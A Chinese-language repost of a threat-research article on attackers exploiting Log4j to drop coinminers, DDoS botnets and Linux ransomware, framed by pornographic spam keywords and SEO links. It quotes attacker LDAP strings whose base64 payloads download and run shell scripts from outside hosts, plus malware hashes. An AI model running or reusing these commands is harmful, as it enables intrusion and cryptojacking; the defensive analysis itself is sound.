japanese少妇高潮潮喷 -精品国产AV一区二区三区-麻豆av一区二区三区久久-国产精品无码专区

盤點:Log4j漏洞帶來的深遠影響

發布時間:2025-09-07 點擊:16
上周,log4j 漏洞顛覆了互聯網,影響是巨大。攻擊者也已經開始利用該漏,到目前為止,uptycs 研究人員已經觀察到與 coinminers、ddos 惡意軟件和一些勒索軟件變種相關的攻擊,這些攻擊積極利用了此漏洞。
未來幾天勒索軟件攻擊的規模可能會增加。由于該漏洞非常嚴重,因此可能還會發現一些可以繞過當前補丁級別或修復程序的變體。因針對這種攻擊持續監控和強化系統是極其重要的。
uptycs 此前在博客中為其客戶分享了有關補救和檢測步驟的詳細信息 。并討論了攻擊者利用 log4j 漏洞的各種惡意軟件類別。uptycs 威脅研究團隊確定了投放在易受攻擊的服務器上的不同類型的有效載荷。有效載荷包括著名的惡意軟件,如 kinsing 和 xmrig coinminers,以及 dofloo、tsunami 和 mirai 僵尸網絡惡意軟件。除了這些惡意軟件系列,攻擊者已經開始在在易受cve-2021-44228服務器上部署勒索軟件。
1. xmrigxmrig 是一個開源的 monero cpu miner,用于挖掘 monero 加密貨幣。攻擊者利用 log4j2 漏洞后,攻擊者試圖運行惡意 shell 腳本,其中包含下載 xmrig 礦工的命令。
命令是 93.189.42 8 []:5557,/基本/命令/ base64/編碼 kgn1cmwglxmgotmumtg5ljqyljgvbgguc2h8fhdnzxqglxeglu8tidkzlje4os40mi44l2xolnnokxxiyxno。
此命令下載礦工shell 腳本/46bd3a99981688996224579db32c46af17f8d29a6c90401fb2f13e918469aff6
shell 腳本(見圖 1)首先殺死已經在運行的礦工二進制文件,然后從互聯網下載 xmrig 礦工二進制文件并運行它。
圖 1:shell 腳本下載并執行 xmrig
2. kinsingkinsing 是一種自我傳播的加密挖掘惡意軟件,以前針對配置錯誤的開放 docker daemon api 端口。kinsing 惡意軟件是用 golang 編寫的,通常是通過惡意 shell 腳本刪除的。kinsing shell 腳本包括幾種防御規避技術,如 setfacl 使用、chattr 使用、日志刪除命令等。
大規模掃描后的攻擊者試圖在易受攻擊的服務器上放置 kinsing 二進制文件。攻擊者用來刪除和運行 shell 腳本的:92.242.40[.]21:5557,/basic/command/base64/kgn1cmwglxmgotiumjqyljqwljixl2xolnnofhx3z2v0ic1xic1plsa5ndagugc2geg2geg2geg2.
在shell腳本:7e9663f87255ae2ff78eb882efe8736431368f341849fec000543f027bdb4512)中,我們可以看到攻擊者在 shell 腳本運行時放置了刪除 kinsing 惡意軟件二進制文件的命令(見圖 2)。
圖 2:通過 shell 腳本下載 kinsing
kinsing shell 腳本還包含與 docker 相關的命令,這些命令會殺死受害系統上已經運行的礦工進程(如果存在)。
圖 3:用于殺死已經運行的礦工的 docker 命令
3. ddos 僵尸網絡負載在一些漏洞利用嘗試中,攻擊者試圖刪除分布式拒絕服務 (ddos) 惡意軟件二進制文件,如 dofloo、mirai。
4. dofloodofloo (又名 aesddos,flooder)是一種ddos類型的惡意軟件,可對目標 ip 地址進行各種泛洪攻擊,如 icmp 和 tcp。除了泛洪攻擊外,dofloo 通過操縱受害者系統中的 rc.local 文件來確保其持久性。它的一些變體在受害計算機上部署了加密貨幣礦工。
在情報系統中,攻擊者也在利用易受攻擊的服務器后投放 dofloo 惡意軟件。由攻擊者使用完整的命令是 81.30.157 43 []:1389,/基本/命令/ base64編碼/ d2dldcbodhrwoi8vmtu1ljk0lje1nc4xnzavywfho2n1cmwglu8gahr0cdovlze1ns45nc4xntqumtcwl2fhyttjag1vzca3nzcgywfhoy4vywfh。下圖(參見圖 4)顯示了 dofloo 對 rc.local 的操作:6e8f2da2a4facc2011522dbcdaca509195bfbdb84dbdc840382b9c40d7975548)在 log4j 后利用中使用的變體。
圖 4:dofloo 操作 rc.local
5. mushtik海嘯(又名mushtik)是基于ddosflooder一個跨平臺的惡意軟件,在下載文件過程中被感染系統中執行shell的命令。海嘯樣本:4c97321bcd291d2ca82c68b02cde465371083dace28502b7eb3a88558d7e190c)使用 crontab 作為持久性。除了持久性,它還刪除一個副本 /dev/shm/ 目錄作為防御規避策略(參見圖 5)。
圖 5:tsunami 通過 cron 從 /dev/shm 運行
6. miraimirai是一種惡意軟件,它感染在 arc 處理器上運行的智能設備,將它們變成一個遠程控制的機器人網絡。mirai 還通過惡意 shell 腳本傳送。攻擊者使用的命令是 45.137.21[.]9:1389,/basic/command/base64/d2dldcatcsatty0gahr0cdovlzyyljixmc4xmzaumjuwl2xolnnofgjhc2g=。該命令使用 wget 實用程序從攻擊者 c2,62.210.130[.]250 中刪除 mirai 惡意軟件(見圖 6)。
圖 6:從 c2 下載 mirai 的 shell 腳本
7. linux攻擊者還利用 log4j 漏洞在易受攻擊的服務器上投放 linux 勒索軟件。攻擊者在利用 log4j 漏洞后試圖刪除linux 勒索軟件:5c8710638fad8eeac382b0323461892a3e1a8865da3625403769a4378622077e。勒索軟件是用 golang 編寫的,并操縱 ssh 文件在受害者系統中傳播自身。攻擊者丟棄的贖金票據如下所示(見圖 7)。
圖 7:linux 贖金說明
8. uptycs edruptycs edr 使用映射到 mitre att&ck 和 yara 進程掃描的行為規則成功檢測到所有有效負載。下面顯示了我們的行為規則主動檢測到的 linux 勒索軟件的示例(參見圖 8)。
圖 8:使用 uptycs edr 檢測勒索軟件
9. xmrig除了行為規則之外,當 yara 檢測被觸發時,uptycs edr 通過威脅研究團隊策劃的 yara 規則分配威脅配置文件。用戶可以導航到檢測警報中的工具包數據部分,然后單擊名稱以查找工具包的說明。uptycs edr 檢測到的 xmrig 惡意軟件活動的摘錄如下所示(見圖 9)。
圖 9:使用 uptycs edr 進行 xmrig 檢測


怎樣才能更好的提高網絡品牌價值
企業短視頻推廣怎么做
SEO引流中,關于網站被降權你不得不知道的事
怎么運用SEO蜘蛛檢查重定向
資訊站的運營和推廣到底怎么做
建設seo網絡營銷網站與傳統seo展示網站的不同特點
網站建站盲目的注重價格對企業會造成的影響
網站設計過程中應該如何設計元素